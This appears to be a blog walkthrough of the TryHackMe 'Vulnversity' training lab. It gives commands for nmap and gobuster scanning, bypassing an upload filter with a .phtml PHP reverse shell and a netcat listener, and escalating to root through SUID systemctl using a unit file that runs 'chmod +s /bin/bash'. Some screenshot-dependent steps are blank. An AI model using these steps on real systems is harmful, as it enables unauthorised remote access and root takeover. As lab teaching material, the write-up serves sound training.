The Dutch Hacker
Vulnversity tryhackme write up

Vulnversity on Tryhackme

This is the write up for the room Vulnversity on Tryhackme and it is part of the complete beginners path

Make connection with VPN or use the attackbox on Tryhackme site to connect to the Tryhackme lab environment.

Tasks Vulnversity

Task 1

Deploy the machine attached to the task and press complete

Task 2

Before reading start scanning the box by typing in the following command

nmap -sV -sC <machines ip>

2.1 There are many nmap “cheatsheets” online that you can use too.

Press complete

2.2 Scan the box, how many ports are open?

Vulnversity on Tryhackme
Answer 6

2.3 What version of the squid proxy is running on the machine?

We can find this in the results of the nmap scan

Vulnversity on Tryhackme
Answer 3.5.12

2.4 How many ports will nmap scan if the flag -p-400 was used?

You can find the answer in the man pages. Easies to find it type in

man nmap| less +/-p-

More infomation about nmap can als be found in the nmap room

Answer 400

2.5 Using the nmap flag -n what will it not resolve?

Answer DNS

2.6 What is the most likely operating system this machine is running?

It is already revealed during the nmap scan

Vulnversity on Tryhackme
Answer Ubuntu

2.7 What port is the web server running on?

We can find it in the nmap scan

Vulnversity on Tryhackme
Answer 3333

Task 3

3.1 What is the directory that has an upload form page?

First type in the command ( Do not copy it. Type it in yourself, for some reason sometimes with gobuster copy/past does break gobuster command )

gobuster dir -u http://<ip>:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

If you want to use a gui interfacte then type in


We find an odd one name internal. Navigating to this reveals an page

Vulnversity on Tryhackme
Answer: internal

Task 4

4.1 Try upload a few file types to the server, what common extension seems to be blocked?

Try to uploading a php file will be blocked. We are getting an error Extension not allowed

Answer .php

4.2 To identify which extensions are not blocked, we’re going to fuzz the upload form.

If you do not know what Burpsuite is and can do then please take a look at these write ups

Start Burpsuite and press complete

4.3 Run this attack, what extension is allowed?

Make a file with the extensions stated in the task

nano phpext.txt

Put in the following extensions inside the file and save it


In firefox turn on FoxyProxy for burpsuite


If you do not know what this is and how to configure then please read this blog Configure Burpsuite with Firefox

refresh the site and turn on intercept in Burpsuite. Ten upload a file and see what happend in burpsuite


Now right click and send to intruder


Now navigate to intruder and change the positions as in the screenshot


Now navigate to the payload tab and import the created list


All the way to the bottom turn off URL encode

Now press the attack button

Notice the different in Length

Answer: .phtml

Now turn off the proxy intercept

4.4 What is the name of the user who manages the webserver?

We are not going to download the webshel as kali provides it unser /usr/share/webshells/php

Vulnversity on Tryhackme

Now copy this file to you document directory. Please do not edit this file.

cp /usr/share/webshells/php/php-reverse-shell.php ~/Documents/webshell.php

now edit the file with

nano webshell.php
Vulnversity on Tryhackme

After you put in your own IP save the file

Start a listener in a new terminal by entering the following command

nc -lvpn 1234

Now rename the file webshell.php to webshell.phtml and upload the file

now navigate to

Vulnversity on Tryhackme

type in the following command to get a better return

python -c 'import pty; pty.spawn("/bin/bash")'

4.5 What is the name of the user who manages the webserver?

navigate to the user directory

Answer: bill

4.6 What is the user flag?

cat the user.txt in the directory of bill. The output is the answer of the question

Task 5

5.1 On the system, search for all SUID files. What file stands out?

Type in the following command to find all SUID files

find / -perm -u=s -type f 2>/dev/null
Vulnversity on Tryhackme
Answer /bin/systemctl

5.2 Become root and get the last flag (/root/root.txt)

Take a look at systemctl | GTFOBins

Type in the following line by line

echo '[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/root.txt"
[Install]' > $TF2
/bin/systemctl link $TF2
/bin/systemctl enable --now $TF2

Now cat root.txt

Vulnversity on Tryhackme

We did not became root we just use this to get the file we wanted.

I tried using a netcat connection but it did not work for me. You can change anything in this line to get what you want

ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/root.txt"

Now how do we become root.

Why not start a shell as root Within this shell

ExecStart=/bin/sh -c "chmod +s /bin/bash"
echo '[Service]
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]' > $TF2
/bin/systemctl link $TF2
/bin/systemctl enable --now $TF2
/bin/bash -p
root bash

Most Popular Post

Sign Up

Signup today for free and be the first to get notified on new updates.
* indicates required

Follow Me

Most Popular Post

Contact Us